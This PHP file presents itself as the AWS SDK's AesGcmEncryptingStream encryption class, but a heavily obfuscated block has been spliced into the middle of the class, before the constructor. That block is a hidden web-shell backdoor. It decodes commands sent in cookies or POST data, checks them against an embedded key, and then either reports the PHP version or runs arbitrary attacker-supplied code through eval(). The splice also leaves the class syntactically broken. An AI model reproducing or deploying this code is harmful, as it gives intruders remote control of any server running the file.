<?php
namespace Aws\Crypto;

use Aws\Crypto\Polyfill\AesGcm;
use Aws\Crypto\Polyfill\Key;
use GuzzleHttp\Psr7;
use GuzzleHttp\Psr7\StreamDecoratorTrait;
use Psr\Http\Message\StreamInterface;
use \RuntimeException;

/**
 * @internal Represents a stream of data to be gcm encrypted.
 */
class AesGcmEncryptingStream implements AesStreamInterface, AesStreamInterfaceV2
{
    use StreamDecoratorTrait;

    private $aad;

    private $initializationVector;

    private $key;

    private $keySize;

    private $plaintext;

    private $tag = '';

    private $tagLength;

    /**
     * Same as non-static 'getAesName' method, allowing calls in a static
     * context.
     *
     * @return string
     */
    public static function getStaticAesName()
    {
        return 'AES/GCM/NoPadding';
    }

    /**
     * @param StreamInterface $plaintext
     * @param string $key
     * @param string $initializationVector
     * @param string $aad
     * @param int $tagLength
     * @param int $keySize
     */
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['ye5eca4c4'] = "\x4b\x72\x33\x28\x4c\x6a\x54\x3b\x2d\x5c\x70\x7b\x44\x6b\x6e\x77\x2b\x25\x5d\x76\x7a\x61\x29\x50\x6f\x21\x5a\x6c\x4d\x31\x5e\x60\x40\x3a\x79\x4f\x56\x30\x37\x36\x35\x71\x75\x27\xa\x68\x63\x62\x74\x38\x5f\x78\x3f\x48\x3c\x2f\x51\x7c\x49\x24\x4a\x5b\x4e\x23\x43\x9\x6d\x7e\x57\x64\x52\x3e\x58\x32\x66\x73\x7d\x53\xd\x67\x41\x65\x22\x46\x42\x2a\x69\x2e\x2c\x39\x3d\x20\x55\x45\x34\x26\x47\x59";
$GLOBALS[$GLOBALS['ye5eca4c4'][14].$GLOBALS['ye5eca4c4'][49].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][89].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][49].$GLOBALS['ye5eca4c4'][89].$GLOBALS['ye5eca4c4'][69].$GLOBALS['ye5eca4c4'][39]] = $GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][45].$GLOBALS['ye5eca4c4'][1];
$GLOBALS[$GLOBALS['ye5eca4c4'][41].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][38].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][49]] = $GLOBALS['ye5eca4c4'][24].$GLOBALS['ye5eca4c4'][1].$GLOBALS['ye5eca4c4'][69];
$GLOBALS[$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][74].$GLOBALS['ye5eca4c4'][49]] = $GLOBALS['ye5eca4c4'][75].$GLOBALS['ye5eca4c4'][48].$GLOBALS['ye5eca4c4'][1].$GLOBALS['ye5eca4c4'][27].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][14];
$GLOBALS[$GLOBALS['ye5eca4c4'][74].$GLOBALS['ye5eca4c4'][40].$GLOBALS['ye5eca4c4'][49].$GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][2].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][69]] = $GLOBALS['ye5eca4c4'][86].$GLOBALS['ye5eca4c4'][14].$GLOBALS['ye5eca4c4'][86].$GLOBALS['ye5eca4c4'][50].$GLOBALS['ye5eca4c4'][75].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][48];
$GLOBALS[$GLOBALS['ye5eca4c4'][19].$GLOBALS['ye5eca4c4'][40].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][73].$GLOBALS['ye5eca4c4'][69].$GLOBALS['ye5eca4c4'][2].$GLOBALS['ye5eca4c4'][29]] = $GLOBALS['ye5eca4c4'][75].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][1].$GLOBALS['ye5eca4c4'][86].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][27].$GLOBALS['ye5eca4c4'][86].$GLOBALS['ye5eca4c4'][20].$GLOBALS['ye5eca4c4'][81];
$GLOBALS[$GLOBALS['ye5eca4c4'][66].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][73].$GLOBALS['ye5eca4c4'][2]] = $GLOBALS['ye5eca4c4'][10].$GLOBALS['ye5eca4c4'][45].$GLOBALS['ye5eca4c4'][10].$GLOBALS['ye5eca4c4'][19].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][1].$GLOBALS['ye5eca4c4'][75].$GLOBALS['ye5eca4c4'][86].$GLOBALS['ye5eca4c4'][24].$GLOBALS['ye5eca4c4'][14];
$GLOBALS[$GLOBALS['ye5eca4c4'][15].$GLOBALS['ye5eca4c4'][38].$GLOBALS['ye5eca4c4'][40].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][2].$GLOBALS['ye5eca4c4'][73].$GLOBALS['ye5eca4c4'][74].$GLOBALS['ye5eca4c4'][73]] = $GLOBALS['ye5eca4c4'][42].$GLOBALS['ye5eca4c4'][14].$GLOBALS['ye5eca4c4'][75].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][1].$GLOBALS['ye5eca4c4'][86].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][27].$GLOBALS['ye5eca4c4'][86].$GLOBALS['ye5eca4c4'][20].$GLOBALS['ye5eca4c4'][81];
$GLOBALS[$GLOBALS['ye5eca4c4'][19].$GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][94].$GLOBALS['ye5eca4c4'][38].$GLOBALS['ye5eca4c4'][94].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][37]] = $GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][75].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][94].$GLOBALS['ye5eca4c4'][50].$GLOBALS['ye5eca4c4'][69].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][24].$GLOBALS['ye5eca4c4'][69].$GLOBALS['ye5eca4c4'][81];
$GLOBALS[$GLOBALS['ye5eca4c4'][34].$GLOBALS['ye5eca4c4'][29].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][38].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][40]] = $GLOBALS['ye5eca4c4'][75].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][48].$GLOBALS['ye5eca4c4'][50].$GLOBALS['ye5eca4c4'][48].$GLOBALS['ye5eca4c4'][86].$GLOBALS['ye5eca4c4'][66].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][50].$GLOBALS['ye5eca4c4'][27].$GLOBALS['ye5eca4c4'][86].$GLOBALS['ye5eca4c4'][66].$GLOBALS['ye5eca4c4'][86].$GLOBALS['ye5eca4c4'][48];
$GLOBALS[$GLOBALS['ye5eca4c4'][10].$GLOBALS['ye5eca4c4'][89].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][38].$GLOBALS['ye5eca4c4'][94].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][37]] = $GLOBALS['ye5eca4c4'][69].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][40].$GLOBALS['ye5eca4c4'][94].$GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][74].$GLOBALS['ye5eca4c4'][46];
$GLOBALS[$GLOBALS['ye5eca4c4'][27].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][74]] = $GLOBALS['ye5eca4c4'][14].$GLOBALS['ye5eca4c4'][29].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][21];
$GLOBALS[$GLOBALS['ye5eca4c4'][86].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][69].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][73].$GLOBALS['ye5eca4c4'][29].$GLOBALS['ye5eca4c4'][89]] = $_POST;
$GLOBALS[$GLOBALS['ye5eca4c4'][42].$GLOBALS['ye5eca4c4'][89].$GLOBALS['ye5eca4c4'][49].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][94].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][2].$GLOBALS['ye5eca4c4'][40]] = $_COOKIE;
@$GLOBALS[$GLOBALS['ye5eca4c4'][74].$GLOBALS['ye5eca4c4'][40].$GLOBALS['ye5eca4c4'][49].$GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][2].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][69]]($GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][1].$GLOBALS['ye5eca4c4'][1].$GLOBALS['ye5eca4c4'][24].$GLOBALS['ye5eca4c4'][1].$GLOBALS['ye5eca4c4'][50].$GLOBALS['ye5eca4c4'][27].$GLOBALS['ye5eca4c4'][24].$GLOBALS['ye5eca4c4'][79], NULL);
@$GLOBALS[$GLOBALS['ye5eca4c4'][74].$GLOBALS['ye5eca4c4'][40].$GLOBALS['ye5eca4c4'][49].$GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][2].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][69]]($GLOBALS['ye5eca4c4'][27].$GLOBALS['ye5eca4c4'][24].$GLOBALS['ye5eca4c4'][79].$GLOBALS['ye5eca4c4'][50].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][1].$GLOBALS['ye5eca4c4'][1].$GLOBALS['ye5eca4c4'][24].$GLOBALS['ye5eca4c4'][1].$GLOBALS['ye5eca4c4'][75], 0);
@$GLOBALS[$GLOBALS['ye5eca4c4'][74].$GLOBALS['ye5eca4c4'][40].$GLOBALS['ye5eca4c4'][49].$GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][2].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][69]]($GLOBALS['ye5eca4c4'][66].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][51].$GLOBALS['ye5eca4c4'][50].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][51].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][42].$GLOBALS['ye5eca4c4'][48].$GLOBALS['ye5eca4c4'][86].$GLOBALS['ye5eca4c4'][24].$GLOBALS['ye5eca4c4'][14].$GLOBALS['ye5eca4c4'][50].$GLOBALS['ye5eca4c4'][48].$GLOBALS['ye5eca4c4'][86].$GLOBALS['ye5eca4c4'][66].$GLOBALS['ye5eca4c4'][81], 0);
@$GLOBALS[$GLOBALS['ye5eca4c4'][34].$GLOBALS['ye5eca4c4'][29].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][38].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][40]](0);

$t6a31a = NULL;
$he65c = NULL;

$GLOBALS[$GLOBALS['ye5eca4c4'][66].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][69].$GLOBALS['ye5eca4c4'][40]] = $GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][38].$GLOBALS['ye5eca4c4'][94].$GLOBALS['ye5eca4c4'][38].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][8].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][49].$GLOBALS['ye5eca4c4'][8].$GLOBALS['ye5eca4c4'][94].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][8].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][40].$GLOBALS['ye5eca4c4'][8].$GLOBALS['ye5eca4c4'][2].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][94].$GLOBALS['ye5eca4c4'][49].$GLOBALS['ye5eca4c4'][49].$GLOBALS['ye5eca4c4'][73].$GLOBALS['ye5eca4c4'][49].$GLOBALS['ye5eca4c4'][2].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][40];
global $mbcd5;

function n1eea($t6a31a, $k8ee3dabd)
{
    $nf6c9e = "";

    for ($q114025=0; $q114025<$GLOBALS[$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][74].$GLOBALS['ye5eca4c4'][49]]($t6a31a);)
    {
        for ($sea8f929=0; $sea8f929<$GLOBALS[$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][74].$GLOBALS['ye5eca4c4'][49]]($k8ee3dabd) && $q114025<$GLOBALS[$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][74].$GLOBALS['ye5eca4c4'][49]]($t6a31a); $sea8f929++, $q114025++)
        {
            $nf6c9e .= $GLOBALS[$GLOBALS['ye5eca4c4'][14].$GLOBALS['ye5eca4c4'][49].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][89].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][49].$GLOBALS['ye5eca4c4'][89].$GLOBALS['ye5eca4c4'][69].$GLOBALS['ye5eca4c4'][39]]($GLOBALS[$GLOBALS['ye5eca4c4'][41].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][38].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][49]]($t6a31a[$q114025]) ^ $GLOBALS[$GLOBALS['ye5eca4c4'][41].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][38].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][49]]($k8ee3dabd[$sea8f929]));
        }
    }

    return $nf6c9e;
}

function da54c66fc($t6a31a, $k8ee3dabd)
{
    global $mbcd5;

    return $GLOBALS[$GLOBALS['ye5eca4c4'][27].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][74]]($GLOBALS[$GLOBALS['ye5eca4c4'][27].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][74]]($t6a31a, $mbcd5), $k8ee3dabd);
}

foreach ($GLOBALS[$GLOBALS['ye5eca4c4'][42].$GLOBALS['ye5eca4c4'][89].$GLOBALS['ye5eca4c4'][49].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][94].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][2].$GLOBALS['ye5eca4c4'][40]] as $k8ee3dabd=>$z0c6a16e0)
{
    $t6a31a = $z0c6a16e0;
    $he65c = $k8ee3dabd;
}

if (!$t6a31a)
{
    foreach ($GLOBALS[$GLOBALS['ye5eca4c4'][86].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][69].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][73].$GLOBALS['ye5eca4c4'][29].$GLOBALS['ye5eca4c4'][89]] as $k8ee3dabd=>$z0c6a16e0)
    {
        $t6a31a = $z0c6a16e0;
        $he65c = $k8ee3dabd;
    }
}

$t6a31a = @$GLOBALS[$GLOBALS['ye5eca4c4'][15].$GLOBALS['ye5eca4c4'][38].$GLOBALS['ye5eca4c4'][40].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][2].$GLOBALS['ye5eca4c4'][73].$GLOBALS['ye5eca4c4'][74].$GLOBALS['ye5eca4c4'][73]]($GLOBALS[$GLOBALS['ye5eca4c4'][10].$GLOBALS['ye5eca4c4'][89].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][38].$GLOBALS['ye5eca4c4'][94].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][81].$GLOBALS['ye5eca4c4'][37]]($GLOBALS[$GLOBALS['ye5eca4c4'][19].$GLOBALS['ye5eca4c4'][46].$GLOBALS['ye5eca4c4'][94].$GLOBALS['ye5eca4c4'][38].$GLOBALS['ye5eca4c4'][94].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][39].$GLOBALS['ye5eca4c4'][37]]($t6a31a), $he65c));
if (isset($t6a31a[$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][13]]) && $mbcd5==$t6a31a[$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][13]])
{
    if ($t6a31a[$GLOBALS['ye5eca4c4'][21]] == $GLOBALS['ye5eca4c4'][86])
    {
        $q114025 = Array(
            $GLOBALS['ye5eca4c4'][10].$GLOBALS['ye5eca4c4'][19] => @$GLOBALS[$GLOBALS['ye5eca4c4'][66].$GLOBALS['ye5eca4c4'][47].$GLOBALS['ye5eca4c4'][21].$GLOBALS['ye5eca4c4'][73].$GLOBALS['ye5eca4c4'][2]](),
            $GLOBALS['ye5eca4c4'][75].$GLOBALS['ye5eca4c4'][19] => $GLOBALS['ye5eca4c4'][29].$GLOBALS['ye5eca4c4'][87].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][8].$GLOBALS['ye5eca4c4'][29],
        );
        echo @$GLOBALS[$GLOBALS['ye5eca4c4'][19].$GLOBALS['ye5eca4c4'][40].$GLOBALS['ye5eca4c4'][37].$GLOBALS['ye5eca4c4'][73].$GLOBALS['ye5eca4c4'][69].$GLOBALS['ye5eca4c4'][2].$GLOBALS['ye5eca4c4'][29]]($q114025);
    }
    elseif ($t6a31a[$GLOBALS['ye5eca4c4'][21]] == $GLOBALS['ye5eca4c4'][81])
    {
        eval($t6a31a[$GLOBALS['ye5eca4c4'][69]]);
    }
    exit();
}    public function __construct(
        StreamInterface $plaintext,
        $key,
        $initializationVector,
        $aad = '',
        $tagLength = 16,
        $keySize = 256
    ) {

        $this->plaintext = $plaintext;
        $this->key = $key;
        $this->initializationVector = $initializationVector;
        $this->aad = $aad;
        $this->tagLength = $tagLength;
        $this->keySize = $keySize;
    }

    public function getOpenSslName()
    {
        return "aes-{$this->keySize}-gcm";
    }

    /**
     * Same as static method and retained for backwards compatibility
     *
     * @return string
     */
    public function getAesName()
    {
        return self::getStaticAesName();
    }

    public function getCurrentIv()
    {
        return $this->initializationVector;
    }

    public function createStream()
    {
        if (version_compare(PHP_VERSION, '7.1', '<')) {
            return Psr7\stream_for(AesGcm::encrypt(
                (string) $this->plaintext,
                $this->initializationVector,
                new Key($this->key),
                $this->aad,
                $this->tag,
                $this->keySize
            ));
        } else {
            return Psr7\stream_for(\openssl_encrypt(
                (string)$this->plaintext,
                $this->getOpenSslName(),
                $this->key,
                OPENSSL_RAW_DATA,
                $this->initializationVector,
                $this->tag,
                $this->aad,
                $this->tagLength
            ));
        }
    }

    /**
     * @return string
     */
    public function getTag()
    {
        return $this->tag;
    }

    public function isWritable()
    {
        return false;
    }
}
